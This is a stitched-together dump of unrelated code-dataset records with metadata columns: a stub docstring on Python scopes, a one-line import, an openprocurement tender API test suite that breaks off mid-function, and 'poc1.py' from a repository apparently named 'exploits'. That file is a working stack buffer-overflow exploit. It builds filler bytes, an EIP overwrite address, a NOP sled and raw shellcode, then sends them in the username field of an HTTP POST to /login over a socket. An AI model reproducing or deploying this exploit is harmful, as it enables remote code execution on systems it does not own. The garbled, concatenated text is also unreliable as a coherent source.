] | null | null | null | .history/my_classes/ScopesClosuresAndDecorators/ScopesClosuresDecorators_20210709201222.py | minefarmer/deep-Dive-1 | b0675b853180c5b5781888266ea63a3793b8d855 | [
"Unlicense"
] | null | null | null | """ Scopes, Closures and Decotations
Variable Scopes local scope
global scope
nonlocal scope
nested scopes
Closures what
""" | 26.111111 | 48 | 0.425532 | 16 | 235 | 6.25 | 0.6875 | 0.28 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.544681 | 235 | 9 | 49 | 26.111111 | 0.934579 | 0.902128 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9aea740a09324f0a12b3ad1a11b3ed2eb08d668 | 3,909 | py | Python | poc1.py | gcheca/exploits | 452b0b65fd549b14fec48a0d22dfe5227c9383a5 | [
"MIT"
] | null | null | null | poc1.py | gcheca/exploits | 452b0b65fd549b14fec48a0d22dfe5227c9383a5 | [
"MIT"
] | null | null | null | poc1.py | gcheca/exploits | 452b0b65fd549b14fec48a0d22dfe5227c9383a5 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import socket
try:
print "\n Sending ""evil"" buffer..."
# size = 800
# inputBuffer = "A" * size
# inputBuffer = "AAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba"
shellcode = ("\xd9\xc1\xd9\x74\x24\xf4\xbe\x58\xb8\x85\xc5\x5f\x33\xc9\xb1"
"\x52\x31\x77\x17\x83\xef\xfc\x03\x2f\xab\x67\x30\x33\x23\xe5"
"\xbb\xcb\xb4\x8a\x32\x2e\x85\x8a\x21\x3b\xb6\x3a\x21\x69\x3b"
"\xb0\x67\x99\xc8\xb4\xaf\xae\x79\x72\x96\x81\x7a\x2f\xea\x80"
"\xf8\x32\x3f\x62\xc0\xfc\x32\x63\x05\xe0\xbf\x31\xde\x6e\x6d"
"\xa5\x6b\x3a\xae\x4e\x27\xaa\xb6\xb3\xf0\xcd\x97\x62\x8a\x97"
"\x37\x85\x5f\xac\x71\x9d\xbc\x89\xc8\x16\x76\x65\xcb\xfe\x46"
"\x86\x60\x3f\x67\x75\x78\x78\x40\x66\x0f\x70\xb2\x1b\x08\x47"
"\xc8\xc7\x9d\x53\x6a\x83\x06\xbf\x8a\x40\xd0\x34\x80\x2d\x96"
"\x12\x85\xb0\x7b\x29\xb1\x39\x7a\xfd\x33\x79\x59\xd9\x18\xd9"
"\xc0\x78\xc5\x8c\xfd\x9a\xa6\x71\x58\xd1\x4b\x65\xd1\xb8\x03"
"\x4a\xd8\x42\xd4\xc4\x6b\x31\xe6\x4b\xc0\xdd\x4a\x03\xce\x1a"
"\xac\x3e\xb6\xb4\x53\xc1\xc7\x9d\x97\x95\x97\xb5\x3e\x96\x73"
"\x45\xbe\x43\xd3\x15\x10\x3c\x94\xc5\xd0\xec\x7c\x0f\xdf\xd3"
"\x9d\x30\x35\x7c\x37\xcb\xde\x43\x60\xa4\xcf\x2c\x73\x4a\xf1"
"\x17\xfa\xac\x9b\x77\xab\x67\x34\xe1\xf6\xf3\xa5\xee\x2c\x7e"
"\xe5\x65\xc3\x7f\xa8\x8d\xae\x93\x5d\x7e\xe5\xc9\xc8\x81\xd3"
"\x65\x96\x10\xb8\x75\xd1\x08\x17\x22\xb6\xff\x6e\xa6\x2a\x59"
"\xd9\xd4\xb6\x3f\x22\x5c\x6d\xfc\xad\x5d\xe0\xb8\x89\x4d\x3c"
"\x40\x96\x39\x90\x17\x40\x97\x56\xce\x22\x41\x01\xbd\xec\x05"
"\xd4\x8d\x2e\x53\xd9\xdb\xd8\xbb\x68\xb2\x9c\xc4\x45\x52\x29"
"\xbd\xbb\xc2\xd6\x14\x78\xf2\x9c\x34\x29\x9b\x78\xad\x6b\xc6"
"\x7a\x18\xaf\xff\xf8\xa8\x50\x04\xe0\xd9\x55\x40\xa6\x32\x24"
"\xd9\x43\x34\x9b\xda\x41")
filler = "A" * 780
eip = "\x83\x0c\x09\x10"
offset = "C" * 4
nops = "\x90" * 10
# buffer = "D" * (1500 - len(filler) - len(eip) - len(offset))
inputBuffer = filler + eip + offset + nops + shellcode
content = "username=" + inputBuffer + "&password=A"
buffer = "POST /login HTTP/1.1\r\n"
buffer +="Host: 0.0.0.0\r\n"
buffer +="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n"
buffer +="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer +="Accept-Language: en-US,en;q=0.5\r\n"
buffer += "Accept-Encoding: gzip, deflate\r\n"
buffer += "Referer: http://0.0.0.0/login\r\n"
buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
buffer += "Content-Length: "+str(len(content))+"\r\n"
buffer += "Connection: close\r\n"
buffer += "Upgrade-Insecure-Requests: 1\r\n"
buffer += "\r\n"
buffer+= content
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect (("0.0.0.0", 80))
s.send(buffer)
s.close()
print"\n Nothing happened here..."
except:
print"Cloud not connect!"
| 52.824324 | 825 | 0.67562 | 551 | 3,909 | 4.787659 | 0.491833 | 0.009098 | 0.036391 | 0.004549 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.235846 | 0.155027 | 3,909 | 73 | 826 | 53.547945 | 0.562822 | 0.244308 | 0 | 0 | 0 | 0.471698 | 0.662258 | 0.520176 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0.018868 | 0.018868 | null | null | 0.056604 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
dbeac69390e3b6c4a8ad5aa3171f252f2fb84e18 | 78 | py | Python | communication_modules/websocketClient/__init__.py | maxakuru/SimpleSensor | 655d10ebed5eddb892d036012cb12ccd6b460d2d | [
"Apache-2.0"
] | null | null | null | communication_modules/websocketClient/__init__.py | maxakuru/SimpleSensor | 655d10ebed5eddb892d036012cb12ccd6b460d2d | [
"Apache-2.0"
] | null | null | null | communication_modules/websocketClient/__init__.py | maxakuru/SimpleSensor | 655d10ebed5eddb892d036012cb12ccd6b460d2d | [
"Apache-2.0"
] | null | null | null | from websocketClientModule import WebsocketClientModule as CommunicationMethod | 78 | 78 | 0.935897 | 6 | 78 | 12.166667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064103 | 78 | 1 | 78 | 78 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e0113e2bd24d4bd31b1158f60c0a0da39a7c3d6c | 53,773 | py | Python | openprocurement/tender/openua/tests/tender_blanks.py | openprocurement/openprocurement.tender.openua | 66b9e15da13a2c367dc15c441a4f02946fc29240 | [
"Apache-2.0"
] | 8 | 2016-01-28T11:37:09.000Z | 2019-03-17T07:18:09.000Z | openprocurement/tender/openua/tests/tender_blanks.py | openprocurement/openprocurement.tender.openua | 66b9e15da13a2c367dc15c441a4f02946fc29240 | [
"Apache-2.0"
] | 70 | 2016-02-11T16:46:22.000Z | 2018-03-19T15:42:16.000Z | openprocurement/tender/openua/tests/tender_blanks.py | openprocurement/openprocurement.tender.openua | 66b9e15da13a2c367dc15c441a4f02946fc29240 | [
"Apache-2.0"
] | 30 | 2016-01-27T10:51:00.000Z | 2019-03-31T15:56:52.000Z | # -*- coding: utf-8 -*-
from datetime import timedelta
from copy import deepcopy
from openprocurement.api.models import get_now
from openprocurement.api.constants import SANDBOX_MODE, CPV_ITEMS_CLASS_FROM
from openprocurement.tender.core.constants import (
NOT_REQUIRED_ADDITIONAL_CLASSIFICATION_FROM
)
from openprocurement.tender.belowthreshold.tests.base import test_organization, test_lots
from openprocurement.tender.openua.models import Tender
# Tender UA Test
def simple_add_tender(self):
u = Tender(self.initial_data)
u.tenderID = "UA-X"
assert u.id is None
assert u.rev is None
u.store(self.db)
assert u.id is not None
assert u.rev is not None
fromdb = self.db.get(u.id)
assert u.tenderID == fromdb['tenderID']
assert u.doc_type == "Tender"
assert u.procurementMethodType == "aboveThresholdUA"
u.delete_instance(self.db)
# TenderUAResourceTest
def empty_listing(self):
response = self.app.get('/tenders')
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data'], [])
self.assertNotIn('{\n "', response.body)
self.assertNotIn('callback({', response.body)
self.assertEqual(response.json['next_page']['offset'], '')
self.assertNotIn('prev_page', response.json)
response = self.app.get('/tenders?opt_jsonp=callback')
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/javascript')
self.assertNotIn('{\n "', response.body)
self.assertIn('callback({', response.body)
response = self.app.get('/tenders?opt_pretty=1')
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertIn('{\n "', response.body)
self.assertNotIn('callback({', response.body)
response = self.app.get('/tenders?opt_jsonp=callback&opt_pretty=1')
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/javascript')
self.assertIn('{\n "', response.body)
self.assertIn('callback({', response.body)
response = self.app.get('/tenders?offset=2015-01-01T00:00:00+02:00&descending=1&limit=10')
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data'], [])
self.assertIn('descending=1', response.json['next_page']['uri'])
self.assertIn('limit=10', response.json['next_page']['uri'])
self.assertNotIn('descending=1', response.json['prev_page']['uri'])
self.assertIn('limit=10', response.json['prev_page']['uri'])
response = self.app.get('/tenders?feed=changes')
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data'], [])
self.assertEqual(response.json['next_page']['offset'], '')
self.assertNotIn('prev_page', response.json)
response = self.app.get('/tenders?feed=changes&offset=0', status=404)
self.assertEqual(response.status, '404 Not Found')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'Offset expired/invalid', u'location': u'params', u'name': u'offset'}
])
response = self.app.get('/tenders?feed=changes&descending=1&limit=10')
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data'], [])
self.assertIn('descending=1', response.json['next_page']['uri'])
self.assertIn('limit=10', response.json['next_page']['uri'])
self.assertNotIn('descending=1', response.json['prev_page']['uri'])
self.assertIn('limit=10', response.json['prev_page']['uri'])
def create_tender_invalid(self):
request_path = '/tenders'
response = self.app.post(request_path, 'data', status=415)
self.assertEqual(response.status, '415 Unsupported Media Type')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description':
u"Content-Type header should be one of ['application/json']", u'location': u'header',
u'name': u'Content-Type'}
])
response = self.app.post(
request_path, 'data', content_type='application/json', status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'No JSON object could be decoded',
u'location': u'body', u'name': u'data'}
])
response = self.app.post_json(request_path, 'data', status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'Data not available',
u'location': u'body', u'name': u'data'}
])
response = self.app.post_json(request_path, {'not_data': {}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'Data not available',
u'location': u'body', u'name': u'data'}
])
response = self.app.post_json(request_path, {'data': []}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'Data not available',
u'location': u'body', u'name': u'data'}
])
response = self.app.post_json(request_path, {'data': {'procurementMethodType': 'invalid_value'}}, status=415)
self.assertEqual(response.status, '415 Unsupported Media Type')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'Not implemented', u'location': u'data', u'name': u'procurementMethodType'}
])
response = self.app.post_json(request_path, {'data': {
'procurementMethodType': 'aboveThresholdUA',
'invalid_field': 'invalid_value'}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'Rogue field', u'location':
u'body', u'name': u'invalid_field'}
])
response = self.app.post_json(request_path, {'data': {'procurementMethodType': 'aboveThresholdUA',
'value': 'invalid_value'}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [
u'Please use a mapping for this field or Value instance instead of unicode.'], u'location': u'body',
u'name': u'value'}
])
response = self.app.post_json(request_path, {'data': {'procurementMethodType': 'aboveThresholdUA',
'procurementMethod': 'invalid_value'}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertIn({u'description': [u"Value must be one of ['open', 'selective', 'limited']."], u'location': u'body',
u'name': u'procurementMethod'}, response.json['errors'])
self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'tenderPeriod'},
response.json['errors'])
self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'minimalStep'},
response.json['errors'])
self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'items'},
response.json['errors'])
self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'value'},
response.json['errors'])
self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'items'},
response.json['errors'])
response = self.app.post_json(request_path, {'data': {'procurementMethodType': 'aboveThresholdUA',
'enquiryPeriod': {'endDate': 'invalid_value'}}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': {u'endDate': [u"Could not parse invalid_value. Should be ISO8601."]}, u'location': u'body',
u'name': u'enquiryPeriod'}
])
response = self.app.post_json(request_path, {'data': {'procurementMethodType': 'aboveThresholdUA',
'enquiryPeriod': {'endDate': '9999-12-31T23:59:59.999999'}}},
status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': {u'endDate': [u'date value out of range']}, u'location': u'body', u'name': u'enquiryPeriod'}
])
data = self.initial_data['tenderPeriod']
self.initial_data['tenderPeriod'] = {'startDate': '2014-10-31T00:00:00', 'endDate': '2014-10-01T00:00:00'}
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
self.initial_data['tenderPeriod'] = data
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': {u'startDate': [u'period should begin before its end']}, u'location': u'body',
u'name': u'tenderPeriod'}
])
self.initial_data['tenderPeriod']['startDate'] = (get_now() - timedelta(minutes=30)).isoformat()
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
del self.initial_data['tenderPeriod']['startDate']
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u'tenderPeriod.startDate should be in greater than current date'], u'location': u'body',
u'name': u'tenderPeriod'}
])
now = get_now()
self.initial_data['awardPeriod'] = {'startDate': now.isoformat(), 'endDate': now.isoformat()}
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
del self.initial_data['awardPeriod']
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u'period should begin after tenderPeriod'], u'location': u'body', u'name': u'awardPeriod'}
])
self.initial_data['auctionPeriod'] = {'startDate': (now + timedelta(days=16)).isoformat(),
'endDate': (now + timedelta(days=16)).isoformat()}
self.initial_data['awardPeriod'] = {'startDate': (now + timedelta(days=15)).isoformat(),
'endDate': (now + timedelta(days=15)).isoformat()}
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
del self.initial_data['auctionPeriod']
del self.initial_data['awardPeriod']
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u'period should begin after auctionPeriod'], u'location': u'body', u'name': u'awardPeriod'}
])
data = self.initial_data['minimalStep']
self.initial_data['minimalStep'] = {'amount': '1000.0'}
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
self.initial_data['minimalStep'] = data
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u'value should be less than value of tender'], u'location': u'body', u'name': u'minimalStep'}
])
data = self.initial_data['minimalStep']
self.initial_data['minimalStep'] = {'amount': '100.0', 'valueAddedTaxIncluded': False}
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
self.initial_data['minimalStep'] = data
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u'valueAddedTaxIncluded should be identical to valueAddedTaxIncluded of value of tender'],
u'location': u'body', u'name': u'minimalStep'}
])
data = self.initial_data['minimalStep']
self.initial_data['minimalStep'] = {'amount': '100.0', 'currency': "USD"}
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
self.initial_data['minimalStep'] = data
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u'currency should be identical to currency of value of tender'], u'location': u'body',
u'name': u'minimalStep'}
])
data = self.initial_data["items"][0].pop("additionalClassifications")
if get_now() > CPV_ITEMS_CLASS_FROM:
cpv_code = self.initial_data["items"][0]['classification']['id']
self.initial_data["items"][0]['classification']['id'] = '99999999-9'
status = 422 if get_now() < NOT_REQUIRED_ADDITIONAL_CLASSIFICATION_FROM else 201
response = self.app.post_json(request_path, {'data': self.initial_data}, status=status)
self.initial_data["items"][0]["additionalClassifications"] = data
if get_now() > CPV_ITEMS_CLASS_FROM:
self.initial_data["items"][0]['classification']['id'] = cpv_code
if status == 201:
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
else:
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [{u'additionalClassifications': [u'This field is required.']}], u'location': u'body',
u'name': u'items'}
])
data = self.initial_data["items"][0]["additionalClassifications"][0]["scheme"]
self.initial_data["items"][0]["additionalClassifications"][0]["scheme"] = 'Не ДКПП'
if get_now() > CPV_ITEMS_CLASS_FROM:
cpv_code = self.initial_data["items"][0]['classification']['id']
self.initial_data["items"][0]['classification']['id'] = '99999999-9'
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
self.initial_data["items"][0]["additionalClassifications"][0]["scheme"] = data
if get_now() > CPV_ITEMS_CLASS_FROM:
self.initial_data["items"][0]['classification']['id'] = cpv_code
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
if get_now() > CPV_ITEMS_CLASS_FROM:
self.assertEqual(response.json['errors'], [
{u'description': [{u'additionalClassifications': [
u"One of additional classifications should be one of [ДК003, ДК015, ДК018, specialNorms]."]}],
u'location': u'body', u'name': u'items'}
])
else:
self.assertEqual(response.json['errors'], [
{u'description': [{u'additionalClassifications': [
u"One of additional classifications should be one of [ДКПП, NONE, ДК003, ДК015, ДК018]."]}],
u'location': u'body', u'name': u'items'}
])
data = test_organization["contactPoint"]["telephone"]
del test_organization["contactPoint"]["telephone"]
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
test_organization["contactPoint"]["telephone"] = data
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': {u'contactPoint': {u'email': [u'telephone or email should be present']}}, u'location': u'body',
u'name': u'procuringEntity'}
])
data = self.initial_data["items"][0].copy()
classification = data['classification'].copy()
classification["id"] = u'19212310-1'
data['classification'] = classification
self.initial_data["items"] = [self.initial_data["items"][0], data]
response = self.app.post_json(request_path, {'data': self.initial_data}, status=422)
self.initial_data["items"] = self.initial_data["items"][:1]
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u'CPV group of items be identical'], u'location': u'body', u'name': u'items'}
])
data = deepcopy(self.initial_data)
del data["items"][0]['deliveryDate']['endDate']
response = self.app.post_json(request_path, {'data': data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [{u'deliveryDate': {u'endDate': [u'This field is required.']}}], u'location': u'body',
u'name': u'items'}
])
def create_tender_generated(self):
data = self.initial_data.copy()
# del data['awardPeriod']
data.update({'id': 'hash', 'doc_id': 'hash2', 'tenderID': 'hash3'})
response = self.app.post_json('/tenders', {'data': data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
tender = response.json['data']
if 'procurementMethodDetails' in tender:
tender.pop('procurementMethodDetails')
self.assertEqual(set(tender), set([
u'procurementMethodType', u'id', u'dateModified', u'tenderID',
u'status', u'enquiryPeriod', u'tenderPeriod', u'complaintPeriod',
u'minimalStep', u'items', u'value', u'procuringEntity',
u'next_check', u'procurementMethod', u'awardCriteria',
u'submissionMethod', u'auctionPeriod', u'title', u'owner', u'date',
]))
self.assertNotEqual(data['id'], tender['id'])
self.assertNotEqual(data['doc_id'], tender['id'])
self.assertNotEqual(data['tenderID'], tender['tenderID'])
def tender_fields(self):
response = self.app.post_json('/tenders', {"data": self.initial_data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
tender = response.json['data']
tender_set = set(tender)
if 'procurementMethodDetails' in tender_set:
tender_set.remove('procurementMethodDetails')
self.assertEqual(tender_set - set(self.initial_data), set([
u'id', u'dateModified', u'enquiryPeriod', u'auctionPeriod',
u'complaintPeriod', u'tenderID', u'status', u'procurementMethod',
u'awardCriteria', u'submissionMethod', u'next_check', u'owner', u'date',
]))
self.assertIn(tender['id'], response.headers['Location'])
def patch_draft_invalid_json(self):
data = self.initial_data.copy()
data.update({'status': 'draft'})
response = self.app.post_json('/tenders', {'data': data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
tender = response.json['data']
owner_token = response.json['access']['token']
self.assertEqual(tender['status'], 'draft')
response = self.app.patch('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
"{}d", content_type='application/json', status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.json['errors'], [
{
"location": "body",
"name": "data",
"description": "Extra data: line 1 column 3 - line 1 column 4 (char 2 - 3)"
}
])
def patch_tender(self):
response = self.app.get('/tenders')
self.assertEqual(response.status, '200 OK')
self.assertEqual(len(response.json['data']), 0)
response = self.app.post_json('/tenders', {'data': self.initial_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
first_date = tender['date']
self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
dateModified = tender.pop('dateModified')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {'status': 'cancelled'}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']['date'], first_date)
self.assertNotEqual(response.json['data']['status'], 'cancelled')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
tender['id'], owner_token), {'data': {'status': 'cancelled'}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertNotEqual(response.json['data']['status'], 'cancelled')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {'procuringEntity': {'kind': 'defense'}}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertNotEqual(response.json['data']['procuringEntity']['kind'], 'defense')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {'tenderPeriod': {'startDate': tender['enquiryPeriod']['endDate']}}},
status=422
)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'], [{
"location": "body",
"name": "tenderPeriod",
"description": [
"tenderPeriod should be greater than 15 days"
]
}
])
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
tender['id'], owner_token), {'data': {'procurementMethodRationale': 'Open'}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertIn('invalidationDate', response.json['data']['enquiryPeriod'])
new_tender = response.json['data']
new_enquiryPeriod = new_tender.pop('enquiryPeriod')
new_dateModified = new_tender.pop('dateModified')
tender.pop('enquiryPeriod')
tender['procurementMethodRationale'] = 'Open'
self.assertEqual(tender, new_tender)
self.assertNotEqual(dateModified, new_dateModified)
revisions = self.db.get(tender['id']).get('revisions')
self.assertTrue(any(
[i for i in revisions[-1][u'changes'] if i['op'] == u'remove' and i['path'] == u'/procurementMethodRationale']))
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
tender['id'], owner_token), {'data': {'dateModified': new_dateModified}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
new_tender2 = response.json['data']
new_enquiryPeriod2 = new_tender2.pop('enquiryPeriod')
new_dateModified2 = new_tender2.pop('dateModified')
self.assertEqual(new_tender, new_tender2)
self.assertNotEqual(new_enquiryPeriod, new_enquiryPeriod2)
self.assertNotEqual(new_dateModified, new_dateModified2)
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
tender['id'], owner_token), {'data': {'items': [self.initial_data['items'][0]]}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
tender['id'], owner_token), {'data': {'items': [{}, self.initial_data['items'][0]]}})
